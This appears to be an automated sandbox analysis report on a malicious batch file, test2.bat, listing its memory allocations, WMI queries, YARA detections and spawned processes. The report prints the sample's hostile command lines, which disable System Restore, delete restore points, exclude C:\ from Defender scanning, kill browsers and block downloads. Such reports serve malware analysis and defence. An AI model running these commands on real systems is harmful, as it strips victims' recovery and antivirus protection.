@ 0x7529d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x752cc44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x7529d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x7529d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x7529d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x7529991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x75298d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7529a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x75299b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x75299aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x74196f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x74196e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x741927a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x74192652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7419253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x74192411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x741925ab wmic+0x39c80 @ 0x7b9c80 wmic+0x3b06a @ 0x7bb06a wmic+0x3b1f8 @ 0x7bb1f8 wmic+0x36fcd @ 0x7b6fcd wmic+0x3d6e9 @ 0x7bd6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 1109040 registers.edi: 1974270480 registers.eax: 1109040 registers.ebp: 1109120 registers.edx: 1 registers.ebx: 6418396 registers.esi: 2147746133 registers.ecx: 2872398577	1

Allocates read-write-execute memory (usually to unpack itself) (50 out of 139 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73961000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73962000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0274b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02747000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02745000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0274c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02733000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02734000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02736000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02737000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02738000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02739000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 5:58 p.m.	process_identifier: 2424 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	wmic /namespace:\\root\default path SystemRestore call Disable("")
cmdline	wmic /namespace:\\root\default path SystemRestore call DeleteAllRestorePoints
cmdline	powershell.exe -command Add-MpPreference -ExclusionPath C:\

Executes one or more WMI queries (6 events)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Telegram.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")

Checks for the Locally Unique Identifier on the system for a suspicious privilege (7 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 16, 2023, 5:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 16, 2023, 5:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 16, 2023, 5:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 16, 2023, 5:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 16, 2023, 5:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 16, 2023, 5:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 16, 2023, 5:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Take ScreenShot	rule	ScreenShot

Uses Windows utilities for basic Windows functionality (15 events)

cmdline	taskkill /F /IM firefox.exe
cmdline	wmic /namespace:\\root\default path SystemRestore call Disable("")
cmdline	taskkill /F /IM chrome.exe
cmdline	taskkill /F /IM Telegram.exe
cmdline	reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT" /v SystemRestore /t REG_SZ /d " " /f
cmdline	taskkill /F /IM opera.exe
cmdline	wmic /namespace:\\root\default path SystemRestore call DeleteAllRestorePoints
cmdline	reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
cmdline	reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Edge" /v DownloadRestrictions /t REG_DWORD /d 3 /f
cmdline	reg add "HKEY_CURRENT_USER\Software\Policies\Google\chrome" /v DownloadRestrictions /t REG_DWORD /d 3 /f
cmdline	reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableReset /t REG_DWORD /d 1 /f
cmdline	reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\SystemRestore" /v SystemRestorePointCreationFrequency /t REG_DWORD /d 0 /f
cmdline	NET FILE
cmdline	taskkill /F /IM msedge.exe
cmdline	taskkill /F /IM brave.exe

Attempts to disable System Restore (1 event)

registry

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

test2.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All